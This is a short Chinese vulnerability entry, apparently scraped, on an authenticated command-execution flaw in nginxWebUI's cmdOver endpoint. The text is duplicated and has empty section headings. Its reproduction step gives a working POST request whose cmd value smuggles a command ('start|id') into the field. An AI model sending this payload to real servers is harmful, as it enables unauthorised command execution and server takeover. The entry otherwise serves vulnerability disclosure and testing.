nginxWebUI cmdOver 后台命令执行漏洞
漏洞描述
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
漏洞影响
网络测绘
漏洞复现
登录页面
验证请求包
POST /adminPage/remote/cmdOver
remoteId=local&cmd=start|id&interval=1
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
登录页面
验证请求包
POST /adminPage/remote/cmdOver
remoteId=local&cmd=start|id&interval=1